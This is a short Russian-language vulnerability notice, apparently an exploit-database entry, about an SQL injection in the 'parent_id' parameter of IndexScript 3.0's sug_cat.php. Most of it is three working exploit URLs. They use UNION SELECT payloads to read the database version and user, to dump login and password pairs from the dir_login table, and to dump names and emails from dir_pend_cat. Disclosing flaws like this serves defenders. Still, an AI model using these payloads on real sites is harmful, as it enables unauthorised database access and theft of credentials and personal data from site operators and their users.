Программа: IndexScript 3.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «parent_id» сценарием sug_cat.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM
dir_login--
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM
dir_pend_cat--
